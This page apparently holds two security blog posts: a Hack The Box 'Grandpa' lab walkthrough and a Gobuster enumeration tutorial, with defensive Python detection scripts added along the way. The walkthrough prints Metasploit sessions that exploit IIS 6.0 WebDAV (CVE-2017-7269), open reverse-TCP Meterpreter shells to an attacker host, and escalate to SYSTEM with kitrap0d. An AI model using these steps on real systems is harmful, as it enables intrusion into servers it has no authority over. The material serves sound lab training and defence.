7/28/2025

HTB: Grandpa

 ___  ___  _________  ________                                      
|\  \|\  \|\___   ___\\   __  \  ___                                
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                               
 \ \   __  \   \ \  \ \ \   __  \|__|                               
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                             
   \ \__\ \__\   \ \__\ \ \_______\|\__\                            
    \|__|\|__|    \|__|  \|_______|\|__|                            
 ________  ________  ________  ________   ________                  
|\   ____\|\   __  \|\   __  \|\   ___  \|\   ___ \                 
\ \  \___|\ \  \|\  \ \  \|\  \ \  \\ \  \ \  \_|\ \  ____________  
 \ \  \  __\ \   _  _\ \   __  \ \  \\ \  \ \  \ \\ \|\____________\
  \ \  \|\  \ \  \\  \\ \  \ \  \ \  \\ \  \ \  \_\\ \|____________|
   \ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\             
    \|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|             
 ________  ________                                                 
|\   __  \|\   __  \                                                
\ \  \|\  \ \  \|\  \                                               
 \ \   ____\ \   __  \                                              
  \ \  \___|\ \  \ \  \                                             
   \ \__\    \ \__\ \__\                                            
    \|__|     \|__|\|__|                                            
                                                                      

Hack The Box's Grandpa is an Easy Windows machine exposing a single service, Microsoft IIS version 6.0, which has a remote command execution vulnerability (CVE-2017-7269). The box covers basic enumeration with Nmap, an easy-to-obtain exploit that ships as a Metasploit module, and some basic privilege escalation.

Once the machine is started on HTB and you are connected to the HTB VPN, open a terminal and ping the machine's IP address to confirm it is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot the target machine.

ping 10.129.95.233

You should receive responses from the IP address. Press CTRL + C to stop sending packets to the target host. Once we have confirmed the host is reachable, it's time to move on to enumeration with Nmap.

Start with a quick service scan using Nmap. The -sV switch enables version detection. You can learn more about Nmap here.

nmap -sV 10.129.95.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:04 CDT
Nmap scan report for 10.129.95.233
Host is up (0.076s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds
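
The walkthrough reads the scan result by eye. As an added example (not part of the original write-up), the Python script below parses Nmap's normal output into structured records and checks each open service against a small, hand-maintained catalogue of end-of-life products, the kind of check a defender runs over scans of their own estate. The SAMPLE_NMAP_OUTPUT text and the catalogue layout are constructed for this illustration; its one entry, IIS 6.0 with CVE-2017-7269, is the finding from this page.

```python
import re

# Constructed sample in the shape of the "nmap -sV" normal output shown above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.129.95.233
Host is up (0.076s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Hypothetical, hand-maintained catalogue of (product, version) -> why it matters.
# Only the IIS 6.0 / CVE-2017-7269 entry comes from the page; the layout is an
# assumption for illustration.
EOL_SERVICES = {
    ("Microsoft IIS httpd", "6.0"):
        "end-of-life; CVE-2017-7269 (WebDAV ScStoragePathFromUrl overflow)",
}

# One port line: "<port>/<proto> <state> <service> <version text...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap(text):
    """Return one dict per port line found in Nmap's normal output."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"].strip()
            results.append(d)
    return results


def split_product_version(version):
    """Split 'Microsoft IIS httpd 6.0' into ('Microsoft IIS httpd', '6.0').
    Nmap puts the version number last and may append a parenthetical such as
    '(protocol 2.0)', which is dropped before splitting."""
    version = re.sub(r"\s*\([^)]*\)$", "", version)
    parts = version.rsplit(" ", 1)
    if len(parts) == 2 and re.match(r"^\d", parts[1]):
        return parts[0], parts[1]
    return version, ""


def flag_eol(results, catalogue=EOL_SERVICES):
    """Return (port, proto, product, version, note) for every open service
    that appears in the catalogue."""
    findings = []
    for r in results:
        if r["state"] != "open":
            continue
        product, ver = split_product_version(r["version"])
        note = catalogue.get((product, ver))
        if note:
            findings.append((r["port"], r["proto"], product, ver, note))
    return findings


if __name__ == "__main__":
    for port, proto, product, ver, note in flag_eol(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}/{proto}: {product} {ver} -> {note}")
```

The parser only looks at port lines, so the same function works on multi-host scans; feed it `nmap -sV -oN scan.txt` output and extend the catalogue with whatever your environment has already retired.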

On port 80 we see Microsoft IIS version 6.0 running. A quick web search shows that this version has a remote command execution vulnerability, CVE-2017-7269. Let's fire up Metasploit and search for a matching exploit module:

msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.4.43-dev                          ]
+ -- --=[ 2483 exploits - 1279 auxiliary - 393 post       ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

[msf](Jobs:0 Agents:0) >> 

Option #0 is a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV service. You can read more about this specific exploit on Rapid7's website here. Let's select it and fill out the required exploit options:

[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute forc
                                             e
   Proxies                         no        A proxy chain of format type:host
                                             :port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://d
                                             ocs.metasploit.com/docs/using-met
                                             asploit/basics/using-metasploit.h
                                             tml
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing co
                                             nnections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thr
                                        ead, process, none)
   LHOST     85.9.199.172     yes       The listen address (an interface may b
                                        e specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set RHOSTS 10.129.95.233
RHOSTS => 10.129.95.233
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:0)

We set RHOSTS to the target IP address and LHOST to the IP address we want the reverse TCP connection to come back to. We can now run the exploit:

[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.95.233:1030) at 2025-07-15 15:10:26 -0500

(Meterpreter 1)(c:\windows\system32\inetsrv) > 

We now have user access to the target machine. After some digging on the system we find we need administrator access in order to read the user.txt flag, so we will need to do some privilege escalation. First, let's migrate into a more stable process that also runs as NT AUTHORITY\NETWORK SERVICE. After listing the running processes with ps, we move into the davcdata.exe process using the migrate command.

(Meterpreter 1)(c:\windows\system32\inetsrv) > ps

Process List
============

 PID   PPID  Name         Arch  Session  User               Path
 ---   ----  ----         ----  -------  ----               ----
 0     0     [System Pro
             cess]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.ex
             e
 392   344   services.ex
             e
 404   344   lsass.exe
 580   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 776   392   svchost.exe
 796   392   svchost.exe
 944   392   spoolsv.exe
 972   392   msdtc.exe
 1092  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.ex
             e
 1228  392   svchost.exe
 1368  392   VGAuthServi
             ce.exe
 1420  392   vmtoolsd.ex
             e
 1508  392   svchost.exe
 1608  392   svchost.exe
 1836  392   alg.exe
 1872  392   dllhost.exe
 1892  580   wmiprvse.ex  x86   0        NT AUTHORITY\NETW  C:\WINDOWS\system3
             e                           ORK SERVICE        2\wbem\wmiprvse.ex
                                                            e
 2420  580   wmiprvse.ex
             e
 3620  1508  w3wp.exe     x86   0        NT AUTHORITY\NETW  c:\windows\system3
                                         ORK SERVICE        2\inetsrv\w3wp.exe
 3692  580   davcdata.ex  x86   0        NT AUTHORITY\NETW  C:\WINDOWS\system3
             e                           ORK SERVICE        2\inetsrv\davcdata
                                                            .exe
 3812  3620  rundll32.ex  x86   0                           C:\WINDOWS\system3
             e                                              2\rundll32.exe

(Meterpreter 1)(c:\windows\system32\inetsrv) > migrate 3692
[*] Migrating from 3812 to 3692...
[*] Migration completed successfully.
(Meterpreter 1)(C:\WINDOWS\system32) > 
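
The ps listing is also worth reading from the defender's side: the Meterpreter stage is running as rundll32.exe (PID 3812), whose parent is the IIS worker process w3wp.exe (PID 3620), and an IIS worker spawning rundll32.exe is a classic sign of a compromised web server. As an added example (not from the original walkthrough), the Python below scans a process snapshot for exactly that kind of parent/child relationship. The PROCESSES list is constructed from the listing above, and the WEB_PARENTS and SUSPICIOUS_CHILDREN sets are illustrative assumptions. Once the session has migrated into davcdata.exe, a legitimate IIS process, this particular signal disappears, so a detection that relies on process lineage alone catches the initial landing but not a migrated implant.

```python
# Constructed process snapshot modelled on the Meterpreter "ps" output above:
# (pid, ppid, name, user). Users are blank where the listing shows none.
PROCESSES = [
    (4, 0, "System", ""),
    (272, 4, "smss.exe", ""),
    (392, 344, "services.exe", ""),
    (580, 392, "svchost.exe", ""),
    (1192, 392, "inetinfo.exe", ""),
    (1508, 392, "svchost.exe", ""),
    (1892, 580, "wmiprvse.exe", "NT AUTHORITY\\NETWORK SERVICE"),
    (3620, 1508, "w3wp.exe", "NT AUTHORITY\\NETWORK SERVICE"),
    (3692, 580, "davcdata.exe", "NT AUTHORITY\\NETWORK SERVICE"),
    (3812, 3620, "rundll32.exe", ""),
]

# Web-serving processes whose children deserve scrutiny (assumption: IIS 6 set).
WEB_PARENTS = {"w3wp.exe", "inetinfo.exe", "davcdata.exe"}

# Children a web worker has no business spawning (assumption: a short, typical list).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe",
}


def build_index(processes):
    """Map pid -> (ppid, name, user) for quick parent lookups."""
    return {pid: (ppid, name, user) for pid, ppid, name, user in processes}


def ancestry(pid, index):
    """Process names from pid up to the highest ancestor present in the snapshot.
    The 'seen' set guards against pid reuse producing a cycle."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        ppid, name, _ = index[pid]
        chain.append(name)
        pid = ppid
    return chain


def find_web_spawned(processes):
    """Return one finding per suspicious child of a web-serving parent."""
    index = build_index(processes)
    findings = []
    for pid, ppid, name, user in processes:
        parent = index.get(ppid)
        if parent and parent[1].lower() in WEB_PARENTS and name.lower() in SUSPICIOUS_CHILDREN:
            findings.append({
                "pid": pid,
                "name": name,
                "parent_pid": ppid,
                "parent": parent[1],
                "user": user or parent[2],      # child inherits the worker's token
                "chain": " <- ".join(ancestry(pid, index)),
            })
    return findings


if __name__ == "__main__":
    for f in find_web_spawned(PROCESSES):
        print(f"PID {f['pid']} {f['name']} spawned by {f['parent']} ({f['parent_pid']}): {f['chain']}")
```

On a live host the same logic runs over Sysmon event ID 1 (process creation, which carries ParentImage) rather than a point-in-time snapshot, so the rundll32.exe launch is recorded even if the operator migrates away a few seconds later.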

After migrating, we can background this session with the background command and search for a local privilege escalation exploit for our target with local_exploit_suggester:

(Meterpreter 1)(C:\WINDOWS\system32) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> use post/multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module
                                               on
   SHOWDESCRIPTION  false            yes       Displays a detailed description
                                                for the available exploits


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
[*] 10.129.95.233 - Collecting local exploits for x86/windows...
[*] 10.129.95.233 - 202 exploit checks are being tried...
[+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.129.95.233 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_comhijack                      No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 17  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 18  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 19  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
 20  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 22  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 23  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 24  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 25  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 26  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 27  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 28  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2003 (5.2 Build 3790, Service Pack 2). is not vulnerable
 29  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 30  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 31  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 33  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 34  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 35  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 37  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 41  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 42  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> 

We receive a list of potential exploits for the target system. We will use option 1, ms10_015_kitrap0d. You can read more about this privilege escalation exploit here. Let's use this exploit, set our options and run it:

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     194.113.72.151   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 3292 launched.
[*] Reflectively injecting the DLL into 3292...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.95.233:1031) at 2025-07-16 10:56:22 -0500

(Meterpreter 2)(C:\WINDOWS\system32) > 

It looks like the exploit was successful. Let's run getuid and see who we are:

(Meterpreter 2)(C:\WINDOWS\system32) > getuid
Server username: NT AUTHORITY\SYSTEM

You can now navigate the target system with SYSTEM privileges to obtain the user.txt and root.txt flags.

7/21/2025

Gobuster Basics for Penetration Testing

   ______      __               __           
  / ____/___  / /_  __  _______/ /____  _____
 / / __/ __ \/ __ \/ / / / ___/ __/ _ \/ ___/
/ /_/ / /_/ / /_/ / /_/ (__  ) /_/  __/ /    
\____/\____/_.___/\__,_/____/\__/\___/_/     
                                             
Gobuster is an open-source command-line tool for web content discovery and vulnerability assessment. Security professionals and ethical hackers use Gobuster for reconnaissance, efficiently brute-forcing directories, files, DNS subdomains, and virtual hosts on web servers. This enumeration tool, written in Go, helps uncover hidden resources, misconfigurations, and potential attack vectors during penetration testing.

By leveraging custom wordlists and flexible operational modes, Gobuster allows for targeted and efficient website scanning and subdomain enumeration. It's an indispensable hacking tool for identifying overlooked administration panels, sensitive files, and forgotten development environments, significantly enhancing the intelligence-gathering phase of any security audit or bug bounty hunting. 

Let's start off by learning about directory enumeration using Gobuster, which can help us discover hidden directories and files within a web server. These files can be vital to us, and may contain backup files, configuration files, temporary files, and even something as sensitive as a password list in a text file. Let's see an example command below and break down its structure:

gobuster dir -u https://examplesite.com -w /usr/share/dirb/wordlists/common.txt 

We can use the "dir" argument to let Gobuster know we want to scan for directories, the "-u" option to mark that we want to scan the URL that follows in the command, and the "-w" option to mark that we want to use a wordlist, followed by the path to the wordlist we want to use.

Wordlists can be downloaded off the web, but most versions of Kali Linux come with some common wordlists, usually located at /usr/share/wordlists. Gobuster's GUI older brother, DirBuster, comes installed with its own wordlists, which you can use with Gobuster as well. I also highly suggest you check out SecLists on GitHub. It's listed on my "Resources:" link list for a reason.

Results of a directory scan using Gobuster will look like the following:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://examplesite.com/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://examplesite.com/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://examplesite.com/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://examplesite.com/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://examplesite.com/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://examplesite.com/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://examplesite.com/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://examplesite.com/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://examplesite.com/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://examplesite.com/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://examplesite.com/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://examplesite.com/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://examplesite.com/filebrowser/]

We receive a list of directories and files on the web server, each tagged with the HTTP status code the server returned. A 200 means the file or directory was found and served, while a 301 (Moved Permanently) means the request was redirected; Gobuster prints the redirect target in brackets, which for a directory is usually the same path with a trailing slash, as with /themes above. Other common status code classes are 4xx (client error), 5xx (server error), and 1xx (informational).
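
When you run Gobuster against your own site, the raw listing is easier to act on once it is grouped. As an added example (not part of the original post), the Python below parses result lines in the gobuster dir format shown above, groups them by status code, pulls out redirect targets, and flags 200 responses whose names suggest files that should not be web-accessible. SAMPLE_GOBUSTER is constructed in the same format (the 403 line is added to show an access-controlled hit), and SENSITIVE_HINTS is an assumed, illustrative list.

```python
import re
from collections import defaultdict

# Constructed sample in the gobuster v3.6 "dir" result-line format shown above.
SAMPLE_GOBUSTER = """\
/index.php            (Status: 200) [Size: 6690]
/themes               (Status: 301) [Size: 0] [--> https://examplesite.com/themes/]
/changelog.txt        (Status: 200) [Size: 271]
/xmlrpc.php           (Status: 200) [Size: 384]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://examplesite.com/filebrowser/]
/admin                (Status: 403) [Size: 277]
"""

# "<path> (Status: NNN) [Size: N]" with an optional "[--> target]" for redirects.
RESULT_LINE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<redirect>[^\]]+)\])?"
)

# Name fragments a reviewer would not want served from their own web root
# (assumption: an illustrative list, extend to taste).
SENSITIVE_HINTS = (".txt", ".bak", ".old", ".zip", ".sql", "backup", "users", "config", "changelog")


def parse_gobuster(text):
    """Return one dict per result line; banner lines are ignored."""
    results = []
    for line in text.splitlines():
        m = RESULT_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            d["size"] = int(d["size"])
            results.append(d)
    return results


def triage(results):
    """Group paths by status, collect redirect targets, and flag served files
    whose names match SENSITIVE_HINTS."""
    by_status = defaultdict(list)
    for r in results:
        by_status[r["status"]].append(r["path"])
    sensitive = [
        r["path"] for r in results
        if r["status"] == 200 and any(h in r["path"].lower() for h in SENSITIVE_HINTS)
    ]
    redirects = {r["path"]: r["redirect"] for r in results if r.get("redirect")}
    return {"by_status": dict(by_status), "sensitive": sensitive, "redirects": redirects}


if __name__ == "__main__":
    report = triage(parse_gobuster(SAMPLE_GOBUSTER))
    for status, paths in sorted(report["by_status"].items()):
        print(f"{status}: {', '.join(paths)}")
    print("review:", ", ".join(report["sensitive"]))
```

Save the scan with `-o scan.txt` and feed the file to `parse_gobuster`; the 403 group is worth a look too, since a Forbidden response confirms the path exists even though it is not served.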

Using this information, we can download discovered files by using wget:

wget http://examplesite.com/path/to/discovered_file.ext

We can also point Gobuster at discovered directories to dig deeper, e.g. https://examplesite.com/filebrowser/.

Next we will learn about scanning for subdomains. Scanning for subdomains expands the attack surface by uncovering hidden or less-secured subdomains, which can host vulnerable applications or services often missed during initial recon. By brute-forcing common prefixes, we can find subdomains not found in public sources, aiding in the identification of potential attack targets and providing a more comprehensive understanding of a target. We can scan for subdomains by simply swapping in the "dns" argument into our command:

gobuster dns -d examplesite.com -w /usr/share/dirb/wordlists/common.txt 

We have added the "-d" option to our command to mark the target domain. Notice we removed the "https://" from our domain. We do not need to specify the protocol when executing a subdomain scan. Following the target domain we will use the "-w" option followed by the path to our wordlist. There are many common subdomain wordlists that can be found on the web which will help with acquiring better results. Below is an example of subdomain scan results:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     examplesite.com
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/dirb/wordlists/common.txt
===============================================================
2025/07/17 16:20:35 Starting gobuster in DNS enumeration mode
===============================================================
Found: www.examplesite.com
Found: nagios.examplesite.com
Found: admin.examplesite.com
Found: about.examplesite.com
Found: dev.examplesite.com   
Found: auto.examplesite.com  
Found: login.examplesite.com

Similar to scanning for subdomains, Gobuster has the ability to scan for virtual hosts. Virtual host (vhost) scanning is a technique used to detect additional websites that reside on the same physical server, but are accessible through different virtual host configurations or domain names. To find vhosts, Gobuster sends HTTP requests to the target IP, changing the 'Host' header in each with names from a wordlist. If a virtual host exists, the web server replies with its content. By performing vhost scanning, you can find unlisted websites or applications that reside on the same server as a familiar site, even if they're not publicly discoverable through DNS.

We can scan for vhosts by using the following command:

gobuster vhost -u examplesite.com -w /usr/share/dirb/wordlists/common.txt 

Results of the scan will appear similar to the following: 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          examplesite.com
[+] Threads:      10
[+] Wordlist:     /usr/share/dirb/wordlists/common.txt 
[+] User Agent:   gobuster/3.6
[+] Timeout:      10s
===============================================================
2025/07/17 8:11:38 Starting gobuster in VHOST enumeration mode
===============================================================
Found: auto.examplesite.com (Status: 200) [Size: 162]
Found: mail.examplesite.com (Status: 200) [Size: 162]
Found: beta.examplesite.com (Status: 200) [Size: 162]
Found: api.examplesite.com (Status: 200) [Size: 162]
Found: apache.examplesite.com (Status: 200) [Size: 162]
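
From the web server's side, both a dir scan and a vhost scan leave a recognisable trace in the access log: a burst of 404s from one address for paths that never existed, or one address asking for many different Host names within a few seconds. As an added example (not from the original post), the Python below runs those two checks, plus a match on the default gobuster/3.6 User-Agent seen in the banners above, over constructed Apache-style access log lines. The lines assume a LogFormat that records the requested Host header (%{Host}i) first; Apache's stock vhost_combined format logs the canonical ServerName (%v) instead, which for unknown names shows the default vhost rather than what the client asked for. Thresholds, addresses and timestamps are assumptions, and the User-Agent is trivially changed by whoever runs the scan, so treat that match as corroboration rather than a signal on its own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed access log lines: "<requested Host>:<port> <client> - - [time] "req" status bytes "referer" "ua"".
SAMPLE_LOG = """\
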